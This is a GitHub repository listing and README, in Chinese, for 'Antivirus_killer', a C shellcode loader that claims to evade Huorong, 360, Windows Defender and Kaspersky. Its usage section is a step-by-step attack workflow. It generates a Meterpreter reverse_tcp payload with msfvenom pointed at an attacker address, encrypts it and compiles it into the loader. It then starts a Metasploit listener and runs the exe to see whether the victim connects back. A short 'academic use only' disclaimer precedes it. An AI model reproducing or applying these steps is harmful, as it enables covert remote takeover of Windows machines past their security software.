https://github.com/paokuwansui/Antivirus_killer
免杀主流防病毒软件
https://github.com/paokuwansui/Antivirus_killer
Last synced: 3 months ago
JSON representation
免杀主流防病毒软件
- Host: GitHub
- URL: https://github.com/paokuwansui/Antivirus_killer
- Owner: paokuwansui
- License: mit
- Created: 2024-08-30T10:47:04.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2024-10-17T08:55:16.000Z (7 months ago)
- Last Synced: 2024-10-19T11:55:47.722Z (7 months ago)
- Language: C
- Size: 54.7 KB
- Stars: 48
- Watchers: 1
- Forks: 5
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - paokuwansui/Antivirus_killer - 免杀主流防病毒软件 (C)
README
# Antivirus_killer
免杀主流防病毒软件
测试于2024年10月17日加载器2024_9_24(需配合新版加密器)可过最新版火绒、360核晶模式、windows自带杀软、卡巴斯基
该项目仅供学术交流参考,请大家合法学习和使用项目
# 使用方法
## 生成shellcode
msfvenom LHOST=x.x.x.x LPORT=443 -p windows/x64/meterpreter/reverse_tcp -f c
## 加密shellcode
将生成的shellcode复制到加密器.c的buf变量中并编译运行
## 编译加载器
将加密后的shellcode 复制到加载器的shellcode变量中编译
## 准备msf监听器
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
run
## 双击编译好的exe观察是否上线
